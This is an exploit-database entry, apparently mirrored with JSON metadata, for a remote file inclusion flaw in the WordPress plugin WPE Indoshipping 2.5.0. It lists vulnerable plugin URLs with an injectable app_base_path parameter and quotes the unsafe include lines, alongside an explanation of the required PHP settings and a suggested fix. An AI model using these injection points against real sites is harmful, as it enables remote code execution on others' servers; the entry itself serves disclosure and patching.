ID 1337DAY-ID-21559
Type zdt
Reporter altiiever
Modified 2013-11-23T00:00:00
Description
WordPress plugin wpe-indoshipping v2.5.0 remote file inclusion (RFI) vulnerability.

#### Usage Info
http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path=[RFI]
```
========================================================
[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion
[+] Author : Altiiever
[+] Version : 2.5.0
[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip
[+] Vulnerability : RFI
========================================================
```
|
| [ Vulnerable ]
|
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]
|
| [ Bug ]
|
| [!] wpe_indoshipping.php
| -include $app_base_path.'admin/admin.php';
| [!] admin-functions.php
| -include_once $app_base_path.'upload/'.$dbfile;
| [!] admin.php
| -include $app_base_path.'admin/admin-functions.php';
| -include $app_base_path.'admin/shipping-manager.php';
| -include $app_base_path.'admin/form-builder.php';
| -include $app_base_path.'admin/tools.php';
| -include $app_base_path.'assets/readme.html';
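|
| Every include listed above builds its path by prefixing $app_base_path. The quoted lines do not show
| where that variable is assigned, so the issue presumably depends on the files being requested directly
| with the variable unset and on PHP populating it from the query string (register_globals, removed in
| PHP 5.4, or an equivalent import of request data).
| Including a remote URL additionally requires allow_url_include=On; with it off, the same pattern
| remains a local file inclusion, so the setting alone is not a fix.
| Fix in the plugin: derive the base path from a server-side value such as plugin_dir_path(__FILE__)
| and exit early when the file is loaded outside WordPress (ABSPATH not defined).
|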
{"id": "1337DAY-ID-21559", "lastseen": "2018-04-08T07:46:36", "viewCount": 10, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-04-08T07:46:36", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/NOVELL_MESSENGER_ACCEPTLANG", "MSF:EXPLOIT/WINDOWS/MISC/MERCURY_PHONEBOOK", "MSF:EXPLOIT/WINDOWS/IMAP/EUDORA_LIST", "MSF:EXPLOIT/LINUX/HTTP/KALTURA_UNSERIALIZE_RCE", "MSF:AUXILIARY/SCANNER/HTTP/CISCO_DIRECTORY_TRAVERSAL", "MSF:EXPLOIT/OSX/SAMBA/TRANS2OPEN", "MSF:EXPLOIT/WINDOWS/MSSQL/LYRIS_LISTMANAGER_WEAK_PASS", "MSF:EXPLOIT/WINDOWS/IMAP/NOVELL_NETMAIL_STATUS"]}, {"type": "zdt", "idList": ["1337DAY-ID-14043", "1337DAY-ID-9783"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21559", "SECURITYVULNS:DOC:14043", "SECURITYVULNS:VULN:9783"]}], "modified": "2018-04-08T07:46:36", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21559", "description": "plugin wpe-indoshipping v2.5.0 RFI vuln#### Usage Info\nhttp://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path=[RFI]", "title": "Wordpress Plugin WPE Indoshipping Remote File Inclusion", "cvelist": [], "sourceData": "```========================================================\r\n[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion\r\n[+] Author : Altiiever\r\n[+] Version : 2.5.0\r\n[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip\r\n[+] Vulnerability : RFI\r\n```========================================================\r\n\r\n|\r\n| [ Vulnerable ] \r\n|\r\n| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]\r\n| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]\r\n| 
http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]\r\n|\r\n| [ Bug ]\r\n| \r\n| [!] wpe_indoshipping.php\r\n|\t-include $app_base_path.'admin/admin.php';\r\n| [!] admin-functions.php\r\n|\t-include_once $app_base_path.'upload/'.$dbfile;\r\n| [!] admin.php\r\n|\t-include $app_base_path.'admin/admin-functions.php';\r\n|\t-include $app_base_path.'admin/shipping-manager.php';\r\n|\t-include $app_base_path.'admin/form-builder.php';\r\n|\t-include $app_base_path.'admin/tools.php';\r\n|\t-include $app_base_path.'assets/readme.html';\r\n|\n\n# 0day.today [2018-04-08] #", "published": "2013-11-23T00:00:00", "references": [], "reporter": "altiiever", "modified": "2013-11-23T00:00:00", "href": "https://0day.today/exploit/description/21559"}
{}